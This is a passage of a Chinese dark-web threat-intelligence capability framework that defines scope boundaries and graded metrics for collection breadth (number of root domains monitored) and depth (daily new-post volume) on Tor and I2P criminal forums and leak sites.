none;font-family:宋体;"><strong><span leaf="">网络安全领域的暗网情报能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，聚焦非法数据交易、IAB 攻击情报、企业 / 机构机密泄露、ATO 威胁、勒索软件、RaaS 等相关威胁；不包含暗网基础设施研究、流量分析、非网络安全类犯罪打击等其他研究方向。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">2．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">生态边界</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：同时覆盖</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">两类核心威胁生态。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">对象边界</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：聚焦黑客论坛、勒索泄露站点、数据交易市场、加密通讯群组、封闭交易频道等网络犯罪相关载体，不含合法匿名网络使用场景。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">功能边界</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">监测、采集、分析、存档、溯源、研判、应急处置</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">为主，不涉及入侵、攻击、控制等违法违规技术能力。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 38.25pt;text-indent: -18.25pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5．</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">合规性边界</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：本框架为技术能力参考文件，相关能力的建设与使用应遵循</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">《中华人民共和国网络安全法》《数据安全法》《个人信息保护法》</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等法律法规要求。使用方在具体实施过程中，应自行确保各项操作符合适用法律及监管规定。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第三章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">Traditional Dark Web 威胁源采集和反爬对抗能力</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web 是基于 Tor、I2P 等匿名网络构建的高隐蔽、高对抗性地下生态空间，主要承载黑客论坛、勒索软件数据泄露站点、数据交易市场、IAB 交易平台、RaaS 服务等网络犯罪相关载体。本章从采集广度、采集深度、反爬对抗、时效性、波动应对、引擎安全六个维度，构建 Traditional Dark Web 威胁源采集与对抗能力的量化评估体系。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">3.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">威胁源采集广度</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.1.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集广度是暗网情报技术能力体系建设的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础性核心指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最大限度降低暗网威胁事件的漏检风险</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，保障数据泄露监测的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">全面性与及时性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">在实际网络安全攻防场景中，攻击者在完成数据窃取后，通常会在多个暗网威胁源进行数据流通与贩卖。若监测体系的采集范围有限，未能实现对核心暗网生态的全覆盖，则极有可能出现相关暗网情报未被监测到的情况。这将直接导致相关单位在数据泄露发生后，无法在</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁早期阶段</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">获取有效预警，进而错失</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">阻断威胁传播、控制泄露影响范围</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的最佳时机。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，威胁源采集广度直接决定了暗网情报体系的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">发现窗口与响应前置性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。只有具备足够的采集广度，才能确保在数据泄露事件发生后，相关敏感信息在暗网流通的第一时间实现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时发现与响应</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为后续开展风险评估、事件研判、溯源取证及应急处置提供全面、可靠的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">情报支撑</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.1.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标主要参考 Javelin Strategy &amp; Research《Dark Web Threat Intelligence Vendor Scorecard（2025）》中关于“</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Source Collection（威胁源采集能力）</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">”的评估维度，并结合全球暗网威胁源的实际分布特征与国内网络安全实战需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">全球暗网站点数量庞大，但绝大多数为毒品、违禁物品、虚假证件等</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">非网络安全类犯罪内容</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，与网络安全直接相关的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">网络犯罪生态站点</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（含黑客论坛、勒索软件泄露站点、数据交易市场、IAB 交易平台等）数量相对集中。从全球实战监测情况来看，真正具备高情报价值、持续活跃的核心威胁源根域，通常集中在数十至数百个范围内。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁源根域数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化标准，并结合行业能力现状划分三级阈值：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">200 个以上</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：代表具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">行业领先的采集覆盖能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，可覆盖绝大多数高价值网络安全类威胁源，包括主流黑客论坛、活跃勒索组织站点及核心数据交易市场，监测范围达到国际一线暗网情报厂商水平，具备全面的暗网威胁发现能力。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">50 个以上</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：代表具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">良好的监测覆盖能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，可有效掌握主要高价值威胁源，能够满足各类机构常态化风险预警与安全运营需求。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">5 个以上</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">：代表满足</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础监测能力要求</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，可覆盖当前最活跃的核心黑客论坛及少量关键泄露站点，能够支撑最基本的暗网威胁关注与发现。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">该指标设计充分贴合暗网威胁源的真实分布规模，同时合理划分能力梯度，确保指标具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">可操作性、可对比性与行业普遍适用性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.1.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集广度以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁源根域数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="153" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="237" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="179" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="153" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集广度</span></span></p></td><td data-colwidth="237" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源根域数量 &gt; 5</span></span></p></td><td data-colwidth="179" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="237" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源根域数量 &gt; 50</span></span></p></td><td data-colwidth="179" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="237" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源根域数量 &gt; 200</span></span></p></td><td data-colwidth="179" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源根域数量指可</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定监测并持续采集</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的网络安全相关</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">网络犯罪生态暗网根域总数</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。该指标重点关注</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高价值威胁源覆盖范围</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，而非暗网站点总体数量。通过该量化标准，可客观评估在 Traditional Dark Web 领域的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集覆盖能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为后续采集深度、反爬对抗及情报分析能力奠定基础支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">3.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">威胁源采集深度</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.2.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集深度是评估暗网情报</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的重要指标。其核心设计目的在于衡量能否</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时、全面地获取暗网威胁源中新发布的高价值内容</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">在实际威胁场景中，攻击者窃取相关单位数据后，往往会通过暗网论坛、泄露站点或交易市场发布相关情报。若对新帖的采集深度不足，则可能无法及时发现此类高价值事件，导致相关单位在数据泄露发生后错失</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">早期预警窗口</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，无法有效采取阻断传播、降低损失的应对措施。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，威胁源采集深度直接关系到能否在威胁情报出现的关键阶段实现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时发现</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，从而为后续风险评估、事件研判和应急处置提供可靠的数据支撑。该指标以 New Post 每日采集量作为量化依据，重点考察对高价值新内容的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">抓取能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.2.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标主要参考 Javelin Strategy &amp; Research《Dark Web Threat Intelligence Vendor Scorecard（2025）》中“</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Source Collection（威胁源采集能力）</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">”的评估维度，并结合 Traditional Dark Web 威胁源的实际发布特征与国内网络安全实战需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web 威胁源中，</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高价值情报</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">主要以 New Post（新主帖）的形式发布，涵盖数据贩卖帖、数据库泄露帖、勒索软件通告、IAB 交易帖等核心内容。此类新帖的出现频率与数量，直接反映了暗网网络犯罪活动的活跃程度，也是采集能力需重点覆盖的核心对象。因此，本框架以 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">New Post 每日采集量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 作为核心量化标准，用以评估对高价值情报的抓取深度。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标分级设计综合考虑三大核心因素：一是全球主要黑客论坛和勒索组织泄露站点的实际发帖规模；二是高价值情报在暗网的分布特点与传播规律；三是不同能力层级在实战中的差异化表现。通过设定科学合理的量化阈值，确保该指标既具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">科学性与合理性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，又能清晰体现不同采集能力在抓取深度上的实际差距，满足行业评估与实战应用需求。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.2.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集深度以 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">New Post 每日采集量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 作为核心量化指标，重点评估对高价值新内容的抓取能力，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="153" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="263" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="152" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="153" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集深度</span></span></p></td><td data-colwidth="263" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">New Post 每日采集量 &gt; 100</span></span></p></td><td data-colwidth="152" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="263" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">New Post 每日采集量 &gt; 200</span></span></p></td><td data-colwidth="152" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="263" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">New Post 每日采集量 &gt; 1000</span></span></p></td><td data-colwidth="152" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">New Post 指暗网威胁源中新发布的主帖，核心涵盖</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据贩卖帖、数据库泄露帖、勒索软件通告、IAB 交易帖</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等高价值内容，是反映暗网威胁动态的核心载体。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">该指标通过量化每日新增主帖的采集数量，客观反映采集能力的深度与全面性 —— 采集量越多、覆盖越全面，越能及时捕捉到暗网中的高价值威胁信息，为后续的情报分析、风险预警以及应急处置，提供真实、有效的数据支撑，避免因遗漏关键新帖而导致的风险防控滞后。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span 